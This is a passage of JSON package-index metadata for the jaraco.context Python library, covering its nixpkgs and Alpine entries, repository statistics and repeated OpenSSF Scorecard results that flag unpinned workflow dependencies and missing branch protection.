GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.710Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python314Packages.jaraco-context?channel=unstable","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python314Packages.jaraco-context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python314Packages.jaraco-context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python314Packages.jaraco-context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python314Packages.jaraco-context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python314Packages.jaraco-context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python314Packages.jaraco-context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python314Packages.jaraco-context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python314Packages.jaraco-context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python314Packages.jaraco-context/codemeta","maintainers":[{"uuid":"fabaff","login":null,"name":"Fabian Affolter","email":"mail@fabian-affolter.ch","url":"https://github.com/fabaff","packages_count":5672,"html_url":null,"role":null,"created_at":"2026-03-08T04:41:13.294Z","updated_at":"2026-03-08T04:41:13.294Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers/fabaff/packages"}],"registry":{"name":"nixpkgs-unstable","url":"https://channels.nixos.org/nixos-unstable","ecosystem":"nixpkgs","default":true,"packages_count":153806,"maintainers_count":4905,"namespaces_count":0,"keywords_count":3257,"github":"NixOS","metadata":{"funded_packages_count":5996},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:52.762Z","updated_at":"2026-08-24T05:00:11.845Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/namespaces"}},{"id":12866412,"name":"python313Packages.jaraco-context","ecosystem":"nixpkgs","description":"Python module for context management","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":["python"],"namespace":null,"versions_count":2,"first_release_published_at":"2026-01-27T02:27:42.850Z","latest_release_published_at":"2026-03-07T01:28:30.093Z","latest_release_number":"6.1.0","last_synced_at":"2026-05-14T00:25:42.099Z","created_at":"2026-01-27T02:27:42.632Z","updated_at":"2026-08-06T19:26:18.728Z","registry_url":"https://search.nixos.org/packages?channel=unstable\u0026query=python313Packages.jaraco-context","install_command":"nix-env -iA nixpkgs.python313Packages.jaraco-context","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-unstable/pkgs/development/python-modules/jaraco-context/default.nix#L38","metadata":{"nix_attribute":"python3.13-jaraco-context-6.1.0","position":"pkgs/development/python-modules/jaraco-context/default.nix:38","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","aarch64-darwin","aarch64-windows","x86_64-windows","i686-windows","i686-freebsd","x86_64-freebsd","aarch64-freebsd"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"jaraco-context","upstream_purl":"pkg:pypi/jaraco-context"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.728Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python313Packages.jaraco-context?channel=unstable","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python313Packages.jaraco-context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python313Packages.jaraco-context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python313Packages.jaraco-context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python313Packages.jaraco-context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python313Packages.jaraco-context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python313Packages.jaraco-context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python313Packages.jaraco-context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python313Packages.jaraco-context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/python313Packages.jaraco-context/codemeta","maintainers":[{"uuid":"fabaff","login":null,"name":"Fabian Affolter","email":"mail@fabian-affolter.ch","url":"https://github.com/fabaff","packages_count":5672,"html_url":null,"role":null,"created_at":"2026-03-07T01:28:30.772Z","updated_at":"2026-03-07T01:28:30.772Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers/fabaff/packages"}],"registry":{"name":"nixpkgs-unstable","url":"https://channels.nixos.org/nixos-unstable","ecosystem":"nixpkgs","default":true,"packages_count":153806,"maintainers_count":4905,"namespaces_count":0,"keywords_count":3257,"github":"NixOS","metadata":{"funded_packages_count":5996},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:52.762Z","updated_at":"2026-08-24T05:00:11.845Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/namespaces"}},{"id":8677081,"name":"py3-jaraco.context","ecosystem":"alpine","description":"Context managers by jaraco","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2023-06-07T05:27:36.000Z","latest_release_published_at":"2023-06-07T05:27:36.000Z","latest_release_number":"4.3.0-r1","last_synced_at":"2026-08-03T19:02:53.400Z","created_at":"2023-12-20T10:28:03.797Z","updated_at":"2026-08-06T19:26:18.767Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.19/community/x86_64/py3-jaraco.context","install_command":"apk add py3-jaraco.context","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned 